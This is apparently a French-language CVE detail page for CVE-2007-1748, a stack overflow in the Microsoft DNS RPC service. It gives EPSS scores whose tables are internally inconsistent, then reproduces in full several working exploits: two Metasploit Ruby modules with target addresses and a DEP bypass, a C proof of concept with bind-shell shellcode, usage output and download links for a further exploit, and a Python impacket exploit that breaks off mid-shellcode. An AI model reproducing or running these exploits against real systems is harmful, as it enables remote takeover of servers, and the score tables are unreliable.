CVE-2007-1748 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	88.18%	–	–
2023-03-12	–	–	–	96.81%	–
2023-04-23	–	–	–	96.96%	–
2023-05-28	–	–	–	96.94%	–
2023-09-17	–	–	–	96.89%	–
2023-10-29	–	–	–	96.69%	–
2023-12-03	–	–	–	96.65%	–
2024-01-14	–	–	–	96.83%	–
2024-02-18	–	–	–	96.76%	–
2024-06-02	–	–	–	96.93%	–
2024-06-02	–	–	–	96.93%	–
2024-12-22	–	–	–	96.96%	–
2025-03-09	–	–	–	96.94%	–
2025-01-19	–	–	–	96.96%	–
2025-03-09	–	–	–	96.94%	–
2025-03-18	–	–	–	–	84.06%
2025-03-18	–	–	–	–	84.06,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-04-23	1%
2023-05-28	1%
2023-09-17	1%
2023-10-29	1%
2023-12-03	1%
2024-01-14	1%
2024-02-18	1%
2024-06-02	1%
2024-06-02	1%
2024-12-22	1%
2025-03-09	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms07_029_msdns_zonename.rb 10503 2010-09-28 15:23:14Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)', 'Description' => %q{ This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. This module exploits the RPC service using the \\DNSSERVER pipe available via SMB. This pipe requires a valid user account to access, so the SMBUSER and SMBPASS options must be specified. }, 'Author' => [ 'hdm', # initial module 'anonymous' # 2 anonymous contributors (2003 support) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10503 $', 'References' => [ ['CVE', '2007-1748'], ['OSVDB', '34100'], ['MSB', 'MS07-029'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 500, # The payload doesn't matter, but make_nops() uses these too 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ], # WS2HELP.DLL [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ], [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ], [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ], # Use the __except_handler3 method (and jmp esp in ATL.dll) [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ], [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ], # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll) [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ], [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], ], 'DisclosureDate' => 'Apr 12 2007', 'DefaultTarget' => 0 )) register_options( [ OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English']) ], self.class) end def gettarget(os) targets.each do |target| if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/)) return target end end return nil end def exploit connect() smb_login() if target.name =~ /Automatic/ case smb_peer_os() when 'Windows NT 4.0' print_status("Detected a Windows NT 4.0 system...") target = nil when 'Windows 5.0' print_status("Detected a Windows 2000 SP0-SP4 target...") target = gettarget('2000') when 'Windows 5.1' print_status("Detected a Windows XP system...") target = nil when /Windows Server 2003 (\d+)$/ print_status("Detected a Windows 2003 SP0 target...") target = gettarget('2003SP0') when /Windows Server 2003 (\d+) Service Pack (\d+)/ print_status("Detected a Windows 2003 SP#{$2} target...") target = gettarget('2003SP12') else print_status("Unknown OS: #{smb_peer_os}") return end end if (not target) print_status("There is no available target for this OS locale") return end print_status("Trying target #{target.name}...") # Bind to the service handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver']) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # Create our buffer with our shellcode first txt = Rex::Text.rand_text_alphanumeric(8192) if (target['OS'] =~ /2000/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [target.ret].pack('V') txt[ off - 4, 2] = "\xeb\x06" txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP0/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3 txt[ off - 4, 2] = "\xeb\x16" # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) addr = target['Rets'][1] - 4 addr1 = addr / 2 addr2 = addr1 + addr % 2 addr1 = addr1 + (addr2 % 12) addr2 = addr2 / 12 txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B # # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here : # # 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0 # 0x77f443d0 mov eax, [ebp+arg_0] # 0x77f443d3 pop esi # 0x77f443d4 pop edi # 0x77f443d5 leave ; mov esp, ebp # 0x77f443d6 retn ; ret txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP12/) off = target['Off'] ib = target['IB'] txt[ off ] = [ib + 0x2566].pack('V') # to bypass NX we need to emulate the call to ZwSetInformationProcess # with generic value (to work on SP1-SP2 + patches) off = 445 # first we set esi to 0xed by getting the value on the stack # # 0x76a81da7: # pop esi <- esi = edh # retn txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V') txt[ off + 28, 4] = [0xed].pack('V') # now we set ecx to 0x7ffe0300, eax to 0xed # 0x76a81da4: # pop ecx <- ecx = 0x7ffe0300 # mov eax, esi <- eax == edh # pop esi # retn txt[ off + 32, 4] = [ib + 0x1da4].pack('V') txt[ off + 36, 4] = [0x7ffe0300].pack('V') # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4) # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX # 0x76a8109c: # call dword ptr [ecx] txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx] txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV') # we catch the second exception to go back to our shellcode, now that # NX is disabled off = 1013 txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll) txt[ off + 24, payload.encoded.length ] = payload.encoded end req = '' # Convert the string to escaped octal txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") print_status('Sending exploit...') begin response = dcerpc.call(1, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0]) end rescue ::Exception => e print_error("Error: #{e}") end handler disconnect end end

## # $Id: ms07_029_msdns_zonename.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)', 'Description' => %q{ This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. }, 'Author' => [ 'hdm', # initial module 'anonymous' # 2 anonymous contributors (2003 support) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ ['CVE', '2007-1748'], ['OSVDB', '34100'], ['MSB', 'MS07-029'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 500, # The payload doesn't matter, but make_nops() uses these too 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ], # WS2HELP.DLL [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ], [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ], [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ], # Use the __except_handler3 method (and jmp esp in ATL.dll) [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ], [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ], # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll) [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ], [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], ], 'DisclosureDate' => 'Apr 12 2007', 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(0), OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English']) ], self.class) end def gettarget(os) targets.each do |target| if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/)) return target end end return nil end def exploit # Ask the endpoint mapper to locate the port for us dport = datastore['RPORT'].to_i if ((dport != 0) && (target.name =~ /Automatic/)) print_error("Unable to use automatic targeting when RPORT is given"); return end if (dport == 0) dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp') if (not dport) print_error("Could not determine the RPC port used by the Microsoft DNS Server") return end print_status("Discovered Microsoft DNS Server RPC service on port #{dport}") end mytarget = nil if (target.name =~ /Automatic/) # scheduler service is only available on 2k3 SP0 and 2000 schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '1ff70682-0a51-30e8-076d-740be8cee98b', '1.0', 'ncacn_ip_tcp') if (not schedport) print_status("Detected a Windows 2003 SP1-SP2 target...") mytarget = gettarget('2003SP12') else # only available on 2003 SP0 schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp') if (not schedport) print_status("Detected a Windows 2000 SP0-SP4 target...") mytarget = gettarget('2000') else print_status("Detected a Windows 2003 SP0 target...") mytarget = gettarget('2003SP0') end end if (not mytarget) print_error("There is no available target for this locale") return end else mytarget = target end # Connect to the high RPC port connect(true, { 'RPORT' => dport }) print_status("Trying target #{target.name}...") # Bind to the service handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # Create our buffer with our shellcode first txt = Rex::Text.rand_text_alphanumeric(8192) if (target['OS'] =~ /2000/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [mytarget.ret].pack('V') txt[ off - 4, 2] = "\xeb\x06" txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP0/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3 txt[ off - 4, 2] = "\xeb\x16" # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) addr = mytarget['Rets'][1] - 4 addr1 = addr / 2 addr2 = addr1 + addr % 2 addr1 = addr1 + (addr2 % 12) addr2 = addr2 / 12 txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B # # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here : # # 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0 # 0x77f443d0 mov eax, [ebp+arg_0] # 0x77f443d3 pop esi # 0x77f443d4 pop edi # 0x77f443d5 leave ; mov esp, ebp # 0x77f443d6 retn ; ret txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V') # jmp esp txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') elsif (mytarget['OS'] =~ /2003SP12/) off = mytarget['Off'] ib = mytarget['IB'] txt[ off ] = [ib + 0x2566].pack('V') # to bypass NX we need to emulate the call to ZwSetInformationProcess # with generic value (to work on SP1-SP2 + patches) off = 445 # first we set esi to 0xed by getting the value on the stack # # 0x76a81da7: # pop esi <- esi = edh # retn txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V') txt[ off + 28, 4] = [0xed].pack('V') # now we set ecx to 0x7ffe0300, eax to 0xed # 0x76a81da4: # pop ecx <- ecx = 0x7ffe0300 # mov eax, esi <- eax == edh # pop esi # retn txt[ off + 32, 4] = [ib + 0x1da4].pack('V') txt[ off + 36, 4] = [0x7ffe0300].pack('V') # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4) # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX # 0x76a8109c: # call dword ptr [ecx] txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx] txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV') # we catch the second exception to go back to our shellcode, now that # NX is disabled off = 1013 txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll) txt[ off + 24, payload.encoded.length ] = payload.encoded end req = '' # Convert the string to escaped octal txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") print_status('Sending exploit...') begin response = dcerpc.call(1, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0]) end rescue ::Exception => e print_error("Error: #{e}") end handler disconnect end end

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows DNS DnssrvQuery() Stack Overflow * [CVE-2007-1748] * * * Description: * A vulnerability has been reported in Microsoft Windows, which can * be exploited by malicious people to compromise a vulnerable system. * The vulnerability is caused due to a boundary error in an RPC interface * of the DNS service used for remote management of the service. This can * be exploited to cause a stack-based buffer overflow via a specially * crafted RPC request. The DnssrvQuery function is vulnerable to this stack * overflow. * * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Advanced Server * Microsoft Windows 2000 Datacenter Server * Microsoft Windows 2000 Server * Microsoft Windows Server 2003 Datacenter Edition * Microsoft Windows Server 2003 Enterprise Edition * Microsoft Windows Server 2003 Standard Edition * Microsoft Windows Server 2003 Web Edition * Microsoft Windows Storage Server 2003 * * Tested on: * Microsoft Windows 2000 Advanced Server * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 Metasploit for releasing it yesterday, only had time to look at it * this morning. Also props to Winny Thomas. * * There are two ways we can embed shellcode. One is to pad each byte of * the shellcode with '\' and jmp EBX. The other way is the one Winny used * which is to pass in the shellcode as the third argument in the rpc function * and jmp EDX after incrementing it appropriately. I used the latter :) * * ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32" ) /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" "\x7d\xe0\xa6\xd2\xab\x1f\x00"; /* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */ unsigned char uszDceBind[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76" "\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; /* DnssrvQuery: opnum 1 */ unsigned char uszDceCall[] = "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00" "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40" "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00" "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00"; unsigned char uszDceEnd1[] = "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01" "\x00\x00"; unsigned char uszJmps[] = /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */ "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77" /* inc edx, jmp edx */ "\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\xFF\x5C\xE2"; void usage( ) { printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n" "\t\t\t(c) 2007 devcode\n\n" "usage: dns.exe <ip> <port>\n"); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[4096]; unsigned char uszPacket[1663]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock\n"); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket\n"); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot connect to server\n"); return -1; } printf("[+] Sending DCE Bind packet...\n"); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send\n"); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { closesocket( sConnect ); printf("[-] Recv failed\n"); return -1; } memset( uszPacket, 0x5C, sizeof( uszPacket ) ); memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 ); memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 ); memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) ); memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) ); printf("[+] Sending DCE Request packet...\n"); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send\n"); return -1; } printf("[+] Check shell on port 4444 :)\n"); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; } // milw0rm.com [2007-04-15]

Exploit v2 features: - Target Remote port 445 (by default but requires auth) - Manual target for dynamic tcp port (without auth) - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting (auto target) - Windows 2000 server and Windows 2003 server (Spanish) supported by default - Fixed bug with Windows 2003 Shellcode - Universal local exploit for Win2k (automatic search for opcodes) - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled) - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns) - Microsoft RPC api used ( who cares? :p ) D:\Programación\DNSTEST>dnstest -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- Usage: dnstest -h 127.0.0.1 (Universal local exploit) dnstest -h host [-t id] [-p port] Targets: 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3) 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k ) 2 (0x7c4fedbb) - Win2k server SP4 English 3 (0x7963edbb) - Win2k server SP4 Italian 4 (0x41414141) - Windows all Denial of Service D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2 -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- [+] Trying to fingerprint target.. (05.02) [+] Remote Host identified as Windows 2003 [-] No port selected. Trying Ninja sk1llz [+] Binding to ncacn_ip_tcp: 192.168.1.2 [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 [+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105] [+] Dynamic DNS rpc port found (1105) [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105] [+] RpcBindingFromStringBinding success [+] Sending Exploit code to DnssrvOperation() [+] Now try to connect to port 4444 also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) # milw0rm.com [2007-04-18]

#!/usr/bin/python # Remote exploit for the 0day Windows DNS RPC service vulnerability as # described in https://www.securityfocus.com/bid/23470/info. Tested on # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 # and then connects to it. # # Cheers to metasploit for the first exploit. # Written for educational and testing purposes. # Author shall bear no responsibility for any damage caused by using this code # Winny Thomas :-) import os import sys import time from impacket.dcerpc import transport, dcerpc, epm from impacket import uuid #Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" shellcode += 